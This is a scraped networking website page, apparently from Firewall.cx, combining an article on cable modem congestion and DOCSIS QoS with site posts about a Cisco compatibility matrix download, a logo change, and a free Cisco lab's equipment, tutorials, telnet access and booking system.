Bandwidth hogs in a subscriber's neighborhood can be a big nuisance. As subscribers attempt to share large files, like music, photos, or home movies, they load up the system. One of the rewards of high-speed Internet connections is the ability to enjoy streaming video and audio. Yet these applications are a heavy load on all parts of the system, not just the final link. System capacity must keep up with both the number of subscribers and the kinds of applications they demand. As the Internet begins to look more like television with higher-quality video and audio, it will require massive downstream capacity to support the data throughput. As the Internet provides more compelling content, it will attract even more subscribers. So the number of subscribers grows and the bandwidth each demands also grows. Keeping up with this growth is a challenge.

Impact of open access

Open access is the result of a fear on the part of the government regulators that cable system operators will be so successful in providing high-speed access to the Internet that other ISPs will be unable to compete. The political remedy is to require cable operators to permit competitive ISPs to operate on their systems. Major issues include how many ISPs to allow, how to integrate them into the cable system, and how to charge them for access. The details of how open access is implemented may add to the traffic jam.

A key component in dealing with open access is the CMTS. The ports on the backend of this equipment connect to the ISPs. But sometimes too few ports are designed into the CMTS for the number of ISPs wishing access. More recent CMTS designs accommodate this need. However, these are expensive pieces of equipment, ranging up to several hundreds of thousands of dollars. An investment in an earlier unit cannot be abandoned without great financial loss.

If the cost of using cable modem access is fairly partitioned between the cost of using the cable system and the access fees charged by the cable company, then the cable operator is fairly compensated for the traffic. With more ISPs promoting service, the likelihood is that there will be more cable modem subscribers and higher usage. This, of course, will contribute to the traffic jam. In addition, the backend processing of billing and cable modem authorization can be a strain on the system.

What to do about the traffic jam?

The most important development in dealing with all these traffic delays is the release of the latest version of the cable modem technical standard. Docsis Release 1.1 (issued by CableLabs in 1999) includes many new capabilities, of which the most pertinent in this context is quality of service (QoS). In most aspects of life, the management of expectations is critical to success. When early adopters of cable modem service shared a lightly loaded service, they became accustomed to lightning access. When more subscribers were added, the loading of the system lowered speed noticeably for each subscriber in peak service times.

Similarly, the difference between peak usage times and the late night or early morning hours can be substantial. It is not human nature to feel grateful for the good times while they last, but rather to feel entitled to good times all the time. The grades of service provided by QoS prevent the buildup of unreasonable expectations and afford the opportunity to contract for guaranteed levels of service. Subscribers with a real need for speed can get it on a reliable basis by paying a higher fee while those with more modest needs can pay a lower price. First class, business class, and economy can be implemented with prices to match.

Beefing up to meet demand

Network traffic engineering is the design and allocation of resources to satisfy demand on a statistical basis. Any economic system must deal with peak loads while not being wasteful at average usage times. Consumers find it difficult to get a dial tone on Mother's Day, because it would be impractically expensive to have a phone system that never failed to provide dial tone. The same is true of a cable modem system. At unusually high peaks, service may be temporarily delayed or even unavailable.

An economic design matches the capacity of all of the system elements so that no element is underutilized while other elements are under constant strain. This means that a properly designed cable modem system will not have one element reach its maximum capacity substantially before other elements are stressed. There should be no weakest links. All links should be of relatively the same capacity.

More subscribers can be handled by allocating more bandwidth. Instead of just one 6-MHz channel for cable modem service, two or more can be allocated along with the hardware and software to support this bandwidth. Since many cable systems are capacity limited, the addition of another 6-MHz channel can be accomplished only by sacrificing the service already assigned to it. A typical modem cable system would have a maximum frequency of about 750 MHz. This allows for 111 or so 6-MHz channels to be allocated to conflicting demands. Perhaps 60-75 of them carry analog television. The remainder are assigned to digital services such as digital television, video on demand, broadband cable service, and telephony.

Canceling service to free up bandwidth for cable modems may cause other subscriber frustrations. While adding another 6-MHz channel solves the downstream capacity problem, if the upstream capacity is the limiting factor in a particular cable system, merely adding more 6-MHz channels will still leave a traffic jam. The extra channels help with only one of the traffic directions.

Cable nodalization is another important option in cable system design for accommodating subscriber demand. Nodalization is essentially the dividing up of the cable system into smaller cable systems, each with its own path to the cable headend. The neighborhood termination of that path is called a node. In effect, then, several cables, instead of a single cable, come out of the headend to serve the neighborhoods.

Cable system nodes cater to anywhere from several thousand subscribers to just a few hundred. Putting in more nodes is costly, but the advantage of nodalization is that the same spectrum can be used differently at each node. A specific 6-MHz channel may carry cable modem bits to the users in one node while the same 6-MHz channel carries completely different cable modem bits to other users in an adjacent node. This has been called space-division multiplexing since it permits different messages to be carried, depending on the subscriber's spatial location.

An early example of this principle was deployed in the Time Warner Cable television system in Queens, New York City. Queens is a melting pot of nationalities. The immigrants there tend to cluster in neighborhoods where they have relatives and friends who can help them make the transition to the new world. The fiber paths to these neighborhoods can use the same 6-MHz channel for programs in different languages. So a given channel number can carry Chinese programming on the fiber serving that neighborhood, Korean programming on another fiber, and Japanese programming on still another fiber. As the 747s fly into the John F. Kennedy International Airport in Queens each night, they bring tapes from participating broadcasters in other countries that become the next day's programming for the various neighborhoods. (Note that this technique is impossible in a broadcast or satellite transmission system since such systems serve the entire broadcast area and cannot employ nodalization.)

The same concept of spectrum reuse is applied to the cable modem. A 6-MHz channel set aside for this purpose carries the cable modem traffic for the neighborhood served by its respective node. While most channels carry the same programming to all nodes, just the channel(s) assigned to the modem service carry specialized information directed to the individual nodes. Importantly, nodalization reuses the upstream spectrum as well as the downstream spectrum. So, given enough nodes, traffic jams are avoided in both directions.

However, nodalization is costly. Optical-fiber paths must be installed from the headend to the individual nodes. The fiber paths require lasers and receivers to convert the optical signals into electrical signals for the coaxial cable in the neighborhood. Additional modulators per node are required at the cable headend , as well as routers to direct the signals to their respective lasers. The capital investment is substantial. However, it is technically possible to solve the problem. (In principle, nodalization could be implemented in a fully coaxial cable system. But in practice coaxial cable has a lot higher losses than fiber and incurs even greater expense in the form of amplifiers and their power supplies.)

Other techniques for alleviating the traffic jam include upgrading the cable system so that 256 QAM can be used instead of 64 QAM downstream and 16 QAM can be used upstream instead of QPSK. If the ISP's connection to the Internet is part of the problem, a larger data capacity connection to the Internet backbone can be installed.

Also, non-Docsis high-speed access systems are under development for very heavy users. These systems will provide guaranteed ultrahigh speeds of multiple megabits per second in the downstream direction while avoiding the loading of the Docsis cable modem channels. The service can then be partitioned into commercial and residential or small business services that do not limit each other's capabilities.

Speculations on the future

The cable modem traffic jam is due to rapid growth that sometimes outpaces the resources available to upgrade the cable system. But solutions may be near at hand.

The next wave of standardization, Docsis 1.1 released in 1999, provides for quality-of-service segmentation of the market. Now that the standard is released, products are in development by suppliers and being certified by CableLabs. Release 1.1 products will migrate into the subscriber base over the next several years. Subscribers will then be able to choose the capacity they require for their purposes and pay an appropriate fee. The effect will be to discourage bandwidth hogs and ensure that those who need high capacity, and are willing to pay for it, get it. And market segmentation will provide financial justification to implement even more comprehensive nodalization. After enough time has passed for these system upgrades to be deployed, the traffic jam should resolve itself.

  • Hits: 18581
Cisco WLC & AP Compatibility Matrix Download

Complete Cisco WLC Wireless Controllers, Aironet APs & Software Compatibility Matrix - Free Download

cisco wlc ap compatibility list downloadFirewall.cx’s download section now includes the Cisco WLC Wireless Controllers Compatibility Matrix as a free download. The file contains two PDFs with an extensive list of all old and new Cisco Wireless Controllers and their supported Access Points across a diverse range of firmware versions.

WLCs compatibility list includes: WLC 2100, 2504, 3504, 4400, 5508, 5520, 7510, 8510, 8540, Virtual Controller, WiSM, WiSM2, SRE, 9800 series and more. 

Access Point series compatibility list includes: 700, 700W, 1000, 1100, 1220, 1230, 1240, 1250, 1260, 1300, 1400, 1520, 1530, 1540, 1550, 1560, 1600, 1700, 1800, 2600, 2700, 2800, 3500, 3600, 3700, 3800, 4800, IW6300, 9100, 9130, 9160,

The compatibility matrix PDFs provide an invaluable map, ensuring that your network components are supported across different software versions. Make informed choices, plan upgrades with precision, and optimize your network's performance effortlessly.

Check the compatibility between various WLC hardware & virtual versions, Access Points and a plethora of Cisco software offerings, such as Cisco Identity Services Engine (ISE), Cisco Prime Infrastructure, innovative Cisco Spaces, and the versatile Mobility Express. This compatibility matrix extends far beyond devices, painting a holistic picture of how different elements of your Cisco ecosystem interact with one another.  Make informed choices, plan upgrades with precision, and optimize your network's performance effortlessly.

Click here to visit the download page.

  • Hits: 2956

Firewall.cx: 15 Years’ Success – New Logo – New Identity – Same Mission

This December (2015) is a very special one. It signals 15 years of passion, education, learning, success and non-stop ‘routing’ of knowledge and technical expertise to the global IT community.

What began 15 years ago as a small pitiful website, with the sole purpose of simplifying complicated networking & security concepts and sharing them with students, administrators, network engineers and IT Managers, went on to become one of the most recognised and popular network security websites in the world.

Thanks to a truly dedicated and honest team, created mainly after our forums kicked in on the 24th of October 2001, Firewall.cx was able to rapidly expand and produce more high-quality content that attracted not only millions of new visitors but also global vendors.

Our material was all of a sudden used at colleges and universities, was referenced by thousands of engineers and sites around the world, then Cisco Systems referenced Firewall.cx resources in its official global CCNA Academy Program!

Today we look back and feel extremely proud of our accomplishment and, after all the recognition, positive feedback from millions and success stories from people who moved forward in their professional career thanks to Firewall.cx, we feel obligated to continue working hard to help this amazing IT community.

Readers who have been following Firewall.cx since the beginning will easily identify the colourful Firewall.cx logo that has been with us since the site first went online. While we’ve changed the site’s design & platform multiple times the logo has remained the same, a piece of our history to which users can relate.

Obviously times have changed since 2000 and we felt (along with many other members) that it was time to move forward and replace our logo with one that will better suit the current Firewall.cx design & community, but at the same time make a real statement about who we are and what our mission is.

So, without any further delay, we would like to present to our community the new Firewall.cx logo:

Firewall.cx - New Logo - The Site for Networking Professionals

 

Explaining Our New Logo

Our new logo communicates what Firewall.cx and its community are all about. The new slogan precisely explains what we do: Route (verb) Information (knowledge) and Expertise to our audience of Network Professionals – that’s you. Of course, we still remain The No.1 Site for Networking Professionals :)

The icon on the left is a unique design that tells two stories:

  1. It’s a router, similar to Cisco’s popular Visio router icons, symbolising the “routing” process of information & expertise mentioned in our slogan.
  2. It symbolises four IT professionals: three represent our community (red) – that’s you, and the fourth (blue) is the Firewall.cx team. All four IT professionals are connected (via their right arm) and share information with each other (the arrows).

We hope our readers will embrace the new logo as much as we did and continue to use Firewall.cx as a trusted resource for IT Networking and Security topics.

On behalf of the Firewall.cx Team - Thank you for all your support. We wouldn’t be here without you.

Chris Partsenidis
Founder & Editor-in-Chief
  • Hits: 6911

Firewall.cx Free Cisco Lab: Equipment Photos

Our Cisco lab equipment has been installed in a 26U - 19' inch rack, complemented by blue neon lighting and a 420VA UPS to keep everything running smoothly, should a blackout occur.

The pictures taken show equipment used in all three labs. Please click on the picture of your choice to load a larger version.

cisco-lab-pictures-3-small

The 2912XL responsible for segmenting the local network, ensuring each lab is kept in its own isolated environment.


cisco-lab-pictures-7
Cisco Lab No.1 - The lab's Catalyst 1912 supporting two cascaded 1603R routers, and a 501 PIX Firewall.



cisco-lab-pictures-6
Cisco Lab No.2 - The lab's two 1603R routers.




cisco-lab-pictures-6Cisco Lab No.3 - Three high-end Cisco switches flooded in blue lighting, making VLAN services a reality.




Cisco Lab No.3 - Optical links connecting the three switches together, permitting complex STP scenarios.

  • Hits: 20379

Firewall.cx Free Cisco Lab: Tutorial Overview

The Free Cisco lab tutorials were created to help our members get the most out of our labs by providing a step-by-step guide to completing specific tasks that vary in difficulty and complexity.

While you are not restricted to these tutorials, we do recommend you take the time to read through them as they cover a variety of configurations designed to enhance your knowledge and experience with these devices.

As one would expect, the first tutorials are simple and designed to help you move gradually into deeper waters. As you move on to the rest of the tutorials, the difficulty will increase noticeably, making the tutorials more challenging.

NOTE: In order to access our labs, you will need to open TCP ports 2001 to 2010. These ports are required so you can telnet directly into the equipment.

Following is a list of available tutorials:

Task 1: Basic Router & Switch Configuration

Router: Configure router's hostname and Ethernet interface. Insert a user mode and privilege mode password, enable secret password, encrypt all passwords, configure VTY password. Perform basic connectivity tests, check nvram, flash and system IOS version. Create a banner motd.

Switch: Configure switch's hostname, Ethernet interface, System name, Switching mode, Broadcast storm control, Port Monitoring, Port configuration, Port Addressing, Network Management, Check Utilisation Report and Switch statistics.

Task 2: Intermediate Router Configuration

Configure the router to place an ISDN call toward a local ISP using ppp authentication (CHAP & PAP). Set the appropriate default gateway for this stub network and configure simple NAT Overload to allow internal clients to access the Internet. Ensure the call is disconnected after 5 minutes inactivity.

Configure Access Control Lists to restrict telnet access to the router from the local network. Create a local user database to restrict telnet access to specific users.

Block all ICMP packets originating from the Local LAN towards the Internet and allow the following Internet services to the local LAN: www, dns, ftp, pop & smtp. Ensure you apply the ACL's to the router's private interface.

Block all incoming packets originating from the Internet.

  • Hits: 28784

Firewall.cx Free Cisco Lab: Our Partners

Our Cisco Lab project is a world first; there is no other Free Cisco Lab offered anywhere in the world! Our technical specifications and the quality of our lab marks a new milestone in free online education, matching the spirit in which this site was created.

While the development of our lab continues we publicly acknowledge and thank the companies that have made this dream a reality from which you can benefit, free of charge!

Each contributor is recognised as a Gold or Silver Partner.

 

cisco-lab-partners-1

logo-gfi
cisco-lab-partners-datavision

 

 

cisco-lab-partners-2

 

cisco-lab-partners-symantecpress

 

cisco-lab-partners-ciscopress

cisco-lab-partners-prenticehall

cisco-lab-partners-addison-wesley
  • Hits: 16639

Firewall.cx Free Cisco Lab: Access and Help

Connecting to the Lab Equipment

In order to access our equipment, the user must initiate a 'telnet' session to each device. The telnet session may be initiated using either of the following two ways:

1) By clicking on the equipment located on the diagram above. If your web browser supports external applications, once you click on a diagram's device, a dos-based telnet window will open and you'll receive the Cisco Lab welcome screen.

Note: The above method will NOT work with Internet Explorer 7, due to security restrictions.

2) Manually initiating a telnet session. On each diagram, note the device port list on the lower left hand corner. These are the ports to which you need to telnet into, so you may access the equipment your lab consists of. You can either use a program of your choice, or follow the traditional dos-based window by clicking on "Start" button, go to the "Run" selection and enter "command" (Windows 95, 98, Me) or "cmd" (Windows 2000, XP, 2003). At the DOS prompt enter:

c:\> telnet ciscolab.no-ip.org xxxx

where 'xxxx' is substituted with the device port number as indicated on the diagram.

For example, if you wanted to connect to a device that users device port 2003, the following would be the command required: telnet ciscolab.no-ip.org 2003

You need to repeat this step for each equipment you need to telnet into.

Cisco 'Secret' Passwords

Each lab requires you to set the 'enable secret' password. It is imperative you use the word "cisco" ,so our automated system is able to reset the equipment for the next user.

We ask that you kindly respect this request to ensure our labs are accessible and usable by everyone.

Since all access attempts are logged by our system, users found storing other 'enable secret' passwords will be blocked from the labs and site in general.

To report any errors or inconsistencies with regards to our lab system, please use the Cisco lab forum.

With your help, we can surely create the world's friendliest and resourceful Free Cisco Lab!

  • Hits: 14189

Firewall.cx Free Cisco Lab: Setting Your Account GMT Timezone

Firewall.cx's Free Cisco Labs make use of a complex system in order to allow users from all over the world create a booking in their local timezone. Prerequisits for a successful booking is the user to have the correct GMT Timezone setting in their Firewall.cx profile, as this is used to calculate and present the current scheduling system in the user's local time.

If you are unsure what GMT Timezone you are in, please visit https://greenwichmeantime.com/ and click on your country.

You can check your GMT Timezone by viewing your account profile. This can be easily done by firstly logging into your account and then clicking on "Your Account" from the site's main module:

cisco-lab-gmt-1

 

 

 

 

 

 

 

 

Next, click on "Your Info" as shown in the screenshot below:

cisco-lab-gmt-2

 

Finally, scroll down to the 'Forums Timezone' and click on the drop-down box to make your selection.

cisco-lab-gmt-3

Once you've select the correct timezone, scroll to the bottom of the page and click on "Save Changes".

Please note that you will need to adjust your GMT Timezone as you enter/exit daylight savings throughout the year.

You are now ready to create your Cisco Lab booking!

red-line

  • Hits: 14083

Firewall.cx Free Cisco Lab: Equipment & Device List

No lab is possible without the right equipment to allow coverage of simple to complex scenarios.

With limited income and our sponsors help, we've done our best to populate our lab with the latest models and technologies offered by Cisco. Our current investment exceeds $10,000 US dollars and we will continue to purchase more equipment as our budget permits.

We are proud to present to you the following equipment that will be made available in our lab:

Routers
3 x 1600 series routers including BRI S/T, Serial and Ethernet interfaces
1 x 1720 series router including BRI S/T, Serial and Fast Ethernet interfaces
1 x 2610 series routers with BRI S/T, Wic-1T, BRI 4B-S/T and Ethernet interfaces
1 x 2612 series router with BRI S/T, Wic-1T, Ethernet and Token Ring interfaces
1 x 2620 series router with Wic-1T and Fast Ethernet interfaces
2 x 3620 series routers with BRI S/T, Wic-1T, Wic-2T, Ethernet, Fast Ethernet interfaces
1 x 1760 series router supporting Cisco Call Manager Express with Fast Ethernet & Voice Wic
1 x Cisco 2522 Frame relay router simulator
Total: 11 Routers
 
Switches
1 x 1912 Catalyst switches with older menu-driven software
1 x 2950G-12T Catalyst switch with 12 Fast Ethernet ports, 2 Gigabit ports (GBIC)
2 x 3524XL Catalyst switch with 24 Fast Ethernet ports, 2 Gigabit ports (GBIC)
Total: 4 Switches
 
Firewall
1 x Pix Firewall 501 v6.3 software
 
Other Devices/Equipment
  • Gbics for connections between catalyst switches
  • Multimode and Singlemode fiber optic cables for connection between switches
  • DB60 x-over cables to simulate leased lines
  • 420 VA UPS to ensure lab availability during power shortage
  • CAT5 UTP cables & patch cords
  • 256/128K Dedicated ADSL Connection for Lab connectivity

red-line

  • Hits: 16697

Firewall.cx Free Cisco Lab: Equipment & Diagrams

Each lab has been designed to cover specific topics of the CCNA & CCNP curriculum, but are in no way limited, as you are given the freedom to execute all commands offered by the device's IOS.

While the lab tutorials exist only as guidelines to help you learn how to implement the services and features provided by the equipment, we do not restrict their usage in any way. This effectively means that full control is given to you and, depending on the lab, a multitude of variations to the lab's tutorial are possible.

Cisco Lab No.1 - Basic Router & Switch Configuration

The first Cisco Lab involves the configuration of one Cisco 1603R router and Catalyst 1912 switch. This equipment has been selected to suit the aim of this lab, which is to serve as an introduction to Cisco technologies and concepts.

The lab is in two parts, the first one covering basic IOS functions such as simple router and switch configuration (hostname, interface IP addresses, flash backup, banners etc).

The second part focuses on ISDN configuration and dialup, including ppp debugging, where the user is required to perform a dialup to an ISP via the lab's ISDN simulator. Basic access lists are covered to help enhance the lab further. Lastly, the user is able to ping real Internet IP Addresses from the 1603R due to the fact the back end router (ISP router) is connected to the lab's Internet connection.

cisco-lab-diagrams-lab-1

 

Equipment Configuration:

Cisco Catalyst 1912
FLASH: 1MB
IOS Version: v8.01.02 Standard Edition
Interfaces:12 Ethernet / 2 Fast Ethernet

 

Cisco 1603R
DRAM / FLASH: 16MB / 16MB
IOS Version: 12.3(22)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

red-line

Cisco Lab No.2 - Advanced Router Configuration

The second Cisco lab focuses on advanced router configuration by covering topics such as WAN connectivity (leased lines) with ISDN backup functionality thrown into the package. GRE (encrypted) tunnels, DHCP services with a touch of dynamic routing protocols such as RIPv2 are also included.

As you can appreciate, the complexity here is greater and therefore the lab is split into 4 separate tutorials to ensure you get the most out of all four tutorials.

You will utilise all three interfaces available on the routers, these include Ethernet, ISDN and Serial interfaces. The primary WAN link is simulated using a back-to-back serial cable and the ISDN backup capability is provided through our lab's dedicated ISDN simulator.

cisco-lab-diagrams-lab-2

 

Equipment Configuration:

Cisco 1603R (router 1)
DRAM / FLASH: 18MB / 16MB
IOS Version: 12.3(6a)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

 

Cisco 1603 (router 2)
DRAM / FLASH: 24MB / 16MB
IOS Version: 12.3(6a)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

red-line

Cisco Lab No.3 - VLANs - VTP & InterVLAN Routing

The third Cisco lab aims to cover the popular VLAN & InterVLAN routing services, which are becoming very common in large complex networks.

The lab consists of two Catalyst 3500XL switches and one Catalyst 2950G as backbone switches, attached to a Cisco 2620 router.

Our third lab has been designed to fully support the latest advanced services offered by Cisco switches such as the creation of VLANs and configuration of the popular InterVLAN Routing service amongst all VLANs and switches.

Advanced VLAN features, such as Virtual Trunk Protocol (VTP) and Trunk links throughout the backbone switches, are tightly integrated into the lab's specifications and extend to support a number of VLAN related services just as it would in a real-world environment.

Further extending this lab's potential, we've added Etherchannel support to allow you to gain experience in creating high-bandwidth links between switches with multiple low-bandwidth interfaces (100Mbps), aggregating these links to form one large pipe (400Mbps in our example).

Lastly, STP (Spanning Tree Protocol) is fully supported. The lab guides you understand the use of STP in order to create fully redundant connections between backbone switches. You are able to disable backbone links, simulating link loss and monitoring the STP protocol, while it activates previously blocked links.

cisco-lab-diagrams-lab-3

This lab requires you to perform the following tasks:

- Basic & advanced VLAN configuration

- Trunk & Access link configuration

- VLAN Database configuration

- VTP (VLAN Trunk Protocol) Server, client and transparent mode configuration

- InterVLAN routing using a 2620 router (Router on a stick)

- EtherChannel link configuration

- Simple STP configuration, Per VLAN STP Plus (PVST+) & link recovery

 

Equipment Configuration:

Cisco 2620 (router 1)
DRAM / FLASH: 48MB / 32MB
IOS Version: 12.2(5d)
Interfaces: 1 Fast Ethernet
 
Cisco Catalyst 3500XL (switch 1)
DRAM / FLASH: 8MB / 4MB
IOS Version: 12.0(5.2)XU - Enterprise Edition Software
Interfaces: 24 Fast Ethernet / 2 Gigabit Ethernet with SX GBIC modules installed
 
Cisco Catalyst 3500XL (switch 2)
DRAM / FLASH: 8MB / 4MB
IOS Version: 12.0(5.4)WC(1) - Enterprise Edition Software
Interfaces: 24 Fast Ethernet / 2 Gigabit Ethernet with SX & LX GBIC modules installed
 
Cisco Catalyst 2950G-12-EI (switch 3)
DRAM / FLASH: 20MB / 8MB
IOS Version: 12.1(6)EA2
Interfaces: 12 Fast Ethernet / 2 Gigabit Ethernet with SX & LX GBIC modules installed
  • Hits: 29712

Firewall.cx Free Cisco Lab: Online Booking System


The Online Booking System is the first step required for any user to access our lab. The process is fairly straightforward and designed to ensure even novice users can use it without problems.

How Does It Work?

To make a valid booking on our system you must be a registered Firewall.cx user. Existing users are able to access the Online Booking System from inside their Firewall.cx account.

Once registered, you will be able to log into your Firewall.cx account and access the Online Booking System.

The Online Booking System was customised to suit our lab's needs and provide a booking schedule for all resources (labs) available to our community. Once logged in, you are able to select the resource (lab) you wish to access, check its availability and finally proceed with your booking.

There are a number of parameters that govern the use of our labs to ensure fair usage and avoid the abuse of this free service. The maximum session time for each lab depends on its complexity. Naturally, the more complex, the more time you will be allowed. When your time has expired you will automatically be logged off and the lab equipment will be reset for the next scheduled user.

Following is a number of screen shots showing how a booking is created. You will also find the user's control panel, from where you can perform all functions described here.

Full instructions are always provided by the use of our 'Help' link located on the upper right corner of the booking system's page.

The Online Booking System login page:

cisco-lab-booking-system-1

red-line

 

The booking system control panel:

cisco-lab-booking-system-2

red-line

The lab scheduler/calendar:

cisco-lab-booking-system-3

red-line

Creating a booking:

cisco-lab-booking-system-4

red-line

User control panel showing current reservations:

cisco-lab-booking-system-5

red-line

  • Hits: 20638